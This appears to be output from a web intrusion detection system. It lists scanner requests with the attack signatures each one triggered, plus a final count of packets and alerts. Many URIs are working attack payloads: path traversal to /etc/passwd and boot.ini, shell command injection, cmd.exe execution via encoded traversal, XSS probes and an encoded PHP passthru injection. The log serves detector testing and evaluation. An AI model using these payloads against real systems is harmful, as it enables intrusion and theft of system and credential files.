Packet [2921]	Uri [/scripts/counter.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2922]	Uri [/scripts/couSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2923]	Uri [/scripts/cphost.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2924]	Uri [/scripts/cphSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2925]	Uri [/scripts/cpshost.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2926]	Uri [/scripts/cpsSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2927]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [2928]	Uri [/scripts/fpadmcgi.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2930]	Uri [/scripts/fpaSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2932]	Uri [/scripts/fpcount.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2933]	Uri [/scripts/fpcSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2934]	Uri [/scripts/fpremadm.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2935]	Uri [/scripts/fprSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2936]	Uri [/scripts/fpsrvadm.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2937]	Uri [/scripts/fpsSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2940]	Uri [/scripts/httpodbc.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2941]	Uri [/scripts/httSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2944]	Uri [/scripts/iisadmin/ism.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2945]	Uri [/scripts/iisadmin/ismSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2946]	Uri [/scripts/no-such-file.pl]	Nattacks [1]	Signatures	[300001513]
Packet [2949]	Uri [/scripts/proxy/w3proxy.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2950]	Uri [/scripts/proxy/w3pSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2952]	Uri [/scripts/root.exe?/c+dir+c:\+/OG]	Nattacks [1]	Signatures	[300001562]
Packet [2964]	Uri [/scripts/samples/search/webhits.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2965]	Uri [/scripts/samples/search/webSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2969]	Uri [/scripts/tools/dsnform.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2970]	Uri [/scripts/tools/dsnSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2972]	Uri [/scripts/tools/getdrvrs.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2973]	Uri [/scripts/tools/getSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2974]	Uri [/scripts/tools/newdsn.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2975]	Uri [/scripts/tools/newSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [2976]	Uri [/scripts/tradecli.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2977]	Uri [/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [5]	Signatures	[300000053]	[300000057]	[300000071]	[300001145]	[300001562]
Packet [2978]	Uri [/scripts/traSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [2979]	Uri [/scripts/traSensePostNotThereNoNo.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [5]	Signatures	[300000053]	[300000057]	[300000071]	[300001145]	[300001562]
Packet [2987]	Uri [/search.asp?term=<%00script>alert('Vulnerable')</script>]	Nattacks [4]	Signatures	[300000052]	[300000508]	[300000515]	[300001359]
Packet [2998]	Uri [/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [2999]	Uri [/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [3012]	Uri [/server-status]	Nattacks [1]	Signatures	[300001899]
Packet [3014]	Uri [/servers/link.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3015]	Uri [/servers/linSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3025]	Uri [/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [3054]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [3055]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [3062]	Uri [/setpasswd.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3064]	Uri [/settings/site.ini]	Nattacks [1]	Signatures	[300001517]
Packet [3069]	Uri [/shop/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [3070]	Uri [/shop/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [3071]	Uri [/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [3]	Signatures	[300000051]	[300001513]	[300001559]
Packet [3072]	Uri [/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [2]	Signatures	[300001513]	[300001559]
Packet [3073]	Uri [/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]
Packet [3074]	Uri [/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [3]	Signatures	[300000051]	[300001513]	[300001559]
Packet [3075]	Uri [/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [2]	Signatures	[300001513]	[300001559]
Packet [3076]	Uri [/shop/php_files/site.config.php+]	Nattacks [1]	Signatures	[300001512]
Packet [3085]	Uri [/shoponline/fpdb/shop.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3086]	Uri [/shoponline/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3088]	Uri [/shopping/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [3089]	Uri [/shopping/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [3092]	Uri [/shopping300.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3093]	Uri [/shopping400.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3094]	Uri [/shoppingdirectory/midicart.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3095]	Uri [/shoppingdirectory/midSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [3096]	Uri [/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3097]	Uri [/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3105]	Uri [/Site/bizSensePostNotThereNoNo.dll]	Nattacks [1]	Signatures	[300001562]
Packet [3106]	Uri [/Site/biztalkhttpreceive.dll]	Nattacks [1]	Signatures	[300001562]
Packet [3157]	Uri [/site_searcher.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3161]	Uri [/smg_Smxcfg30.exe?vcc=3560121183d3]	Nattacks [1]	Signatures	[300001562]
Packet [3186]	Uri [/sqldump.sql]	Nattacks [1]	Signatures	[300001526]
Packet [3187]	Uri [/sqlnet.log]	Nattacks [1]	Signatures	[300001518]
Packet [3197]	Uri [/ss.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [3202]	Uri [/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001562]
Packet [3233]	Uri [/structure.sql]	Nattacks [1]	Signatures	[300001526]
Packet [3249]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3264]	Uri [/sysuser/docmgr/iecreate.stm?template=../]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [3266]	Uri [/sysuser/docmgr/ieedit.stm?url=../]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [3271]	Uri [/technote/print.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3272]	Uri [/technote/priSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3279]	Uri [/test.php%20]	Nattacks [1]	Signatures	[300001512]
Packet [3280]	Uri [/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [2]	Signatures	[300000052]	[300000508]
Packet [3281]	Uri [/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [2]	Signatures	[300000052]	[300000508]
Packet [3284]	Uri [/test/jsp/buffer1.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3285]	Uri [/test/jsp/buffer2.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3286]	Uri [/test/jsp/buffer3.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3287]	Uri [/test/jsp/buffer4.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3288]	Uri [/test/jsp/declaration/IntegerOverflow.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3289]	Uri [/test/jsp/extends1.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3290]	Uri [/test/jsp/extends2.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3291]	Uri [/test/jsp/Language.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3292]	Uri [/test/jsp/pageAutoFlush.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3293]	Uri [/test/jsp/pageDouble.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3294]	Uri [/test/jsp/pageExtends.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3295]	Uri [/test/jsp/pageImport2.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3296]	Uri [/test/jsp/pageInfo.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3297]	Uri [/test/jsp/pageInvalid.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3298]	Uri [/test/jsp/pageIsErrorPage.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3299]	Uri [/test/jsp/pageIsThreadSafe.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3300]	Uri [/test/jsp/pageSession.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3301]	Uri [/test/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [3302]	Uri [/test/realPath.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3321]	Uri [/tmp_view.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [3344]	Uri [/tvcs/getSensePostNotThereNoNo.exe?action=selects1]	Nattacks [1]	Signatures	[300001562]
Packet [3345]	Uri [/tvcs/getservers.exe?action=selects1]	Nattacks [1]	Signatures	[300001562]
Packet [3349]	Uri [/typo3conf/database.sql]	Nattacks [1]	Signatures	[300001526]
Packet [3350]	Uri [/typo3conf/datSensePostNotThereNoNo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [3354]	Uri [/uifc/MultFileUploadHandler.php+]	Nattacks [1]	Signatures	[300001512]
Packet [3362]	Uri [/url.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3363]	Uri [/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [3371]	Uri [/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd]	Nattacks [3]	Signatures	[300000051]	[300001513]	[300001559]
Packet [3375]	Uri [/users/scripts/submit.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3376]	Uri [/users/scripts/subSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3383]	Uri [/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [3384]	Uri [/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [3465]	Uri [/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3466]	Uri [/viewpage.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [3467]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3468]	Uri [/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3469]	Uri [/view_source.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3474]	Uri [/wa.exe]	Nattacks [1]	Signatures	[300001562]
Packet [3480]	Uri [/web-console/ServerInfo.jsp%00]	Nattacks [2]	Signatures	[300001359]	[300001516]
Packet [3484]	Uri [/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [3491]	Uri [/WebAdmin.dll?View=Logon]	Nattacks [1]	Signatures	[300001562]
Packet [3499]	Uri [/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3533]	Uri [/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [3534]	Uri [/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [3544]	Uri [/webtop/wdk/samples/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [3549]	Uri [/web_app/WEB-INF/webapp.properties]	Nattacks [2]	Signatures	[300001517]	[300001893]
Packet [3552]	Uri [/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [3563]	Uri [/WS_FTP.ini]	Nattacks [1]	Signatures	[300001517]
Packet [3564]	Uri [/ws_ftp.ini]	Nattacks [1]	Signatures	[300001517]
Packet [3571]	Uri [/wwwboard/wwwboard.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3572]	Uri [/wwwboard/wwwboard.pl]	Nattacks [1]	Signatures	[300001513]
Packet [3573]	Uri [/wwwboard/wwwSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [3574]	Uri [/wwwboard/wwwSensePostNotThereNoNod.pl]	Nattacks [1]	Signatures	[300001513]
Packet [3583]	Uri [/wx/s.dll?d=/boot.ini]	Nattacks [1]	Signatures	[300001562]
Packet [3590]	Uri [/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS]	Nattacks [1]	Signatures	[300001021]
Packet [3604]	Uri [/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [3605]	Uri [/[SecCheck]/..%252f..%252f../extSensePostNotThereNoNo.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [3606]	Uri [/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [3607]	Uri [/[SecCheck]/..%255c..%255c../extSensePostNotThereNoNo.ini]	Nattacks [2]	Signatures	[300000067]	[300001517]
Packet [3608]	Uri [/[SecCheck]/..%2f../ext.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [3609]	Uri [/[SecCheck]/..%2f../extSensePostNotThereNoNo.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [3642]	Uri [/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [3643]	Uri [/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3644]	Uri [/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3]	Signatures	[300000067]	[300001562]	[300001897]
Packet [3645]	Uri [/_vti_bin/admin.pl]	Nattacks [2]	Signatures	[300001513]	[300001897]
Packet [3646]	Uri [/_vti_bin/admSensePostNotThereNoNon.pl]	Nattacks [2]	Signatures	[300001513]	[300001897]
Packet [3647]	Uri [/_vti_bin/cfgSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3648]	Uri [/_vti_bin/cfgwiz.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3649]	Uri [/_vti_bin/CGImail.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3650]	Uri [/_vti_bin/CGISensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3651]	Uri [/_vti_bin/conSensePostNotThereNoNo.htm]	Nattacks [1]	Signatures	[300001897]
Packet [3652]	Uri [/_vti_bin/contents.htm]	Nattacks [1]	Signatures	[300001897]
Packet [3653]	Uri [/_vti_bin/fpadmin.htm]	Nattacks [1]	Signatures	[300001897]
Packet [3654]	Uri [/_vti_bin/fpaSensePostNotThereNoNo.htm]	Nattacks [1]	Signatures	[300001897]
Packet [3655]	Uri [/_vti_bin/fpcount.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3656]	Uri [/_vti_bin/fpcount.exe/]	Nattacks [1]	Signatures	[300001897]
Packet [3657]	Uri [/_vti_bin/fpremadm.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3658]	Uri [/_vti_bin/fprSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3659]	Uri [/_vti_bin/fpsrvadm.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3660]	Uri [/_vti_bin/fpsSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3661]	Uri [/_vti_bin/shtml.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3662]	Uri [/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611]	Nattacks [2]	Signatures	[300001897]	[300001898]
Packet [3663]	Uri [/_vti_bin/shtml.dll/_vtSensePostNotThereNoNo_rpc?method=server+version%3a4%2e0%2e2%2e2611]	Nattacks [1]	Signatures	[300001897]
Packet [3664]	Uri [/_vti_bin/shtml.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3665]	Uri [/_vti_bin/shtml.exe/junk_nonexistant.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3666]	Uri [/_vti_bin/shtml.exe/_vti_rpc]	Nattacks [2]	Signatures	[300001897]	[300001898]
Packet [3667]	Uri [/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611]	Nattacks [2]	Signatures	[300001897]	[300001898]
Packet [3668]	Uri [/_vti_bin/shtml.exe/_vtSensePostNotThereNoNo_rpc]	Nattacks [1]	Signatures	[300001897]
Packet [3669]	Uri [/_vti_bin/shtml.exe/_vtSensePostNotThereNoNo_rpc?method=server+version%3a4%2e0%2e2%2e2611]	Nattacks [1]	Signatures	[300001897]
Packet [3670]	Uri [/_vti_bin/shtSensePostNotThereNoNo.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3671]	Uri [/_vti_bin/shtSensePostNotThereNoNo.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3672]	Uri [/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3673]	Uri [/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3674]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3675]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3676]	Uri [/_vti_bin/_vti_aut/dvwSensePostNotThereNoNo.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3677]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3678]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3679]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3680]	Uri [/_vti_bin/_vti_aut/fp3SensePostNotThereNoNo.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [3681]	Uri [/_vti_bin/_vti_cnf/]	Nattacks [1]	Signatures	[300001897]
Packet [3682]	Uri [/_vti_bin/_vtSensePostNotThereNoNo_cnf/]	Nattacks [1]	Signatures	[300001897]
Packet [3710]	Uri [/~nobody/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001872]
Packet [3711]	Uri [/~root/]	Nattacks [1]	Signatures	[300001872]
Packet [3712]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3713]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3714]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3715]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3718]	Uri [@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [3719]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
# N. packets [3721], [856] with alerts, N. Alerts [1514]
# Execution time: 0.476840 s
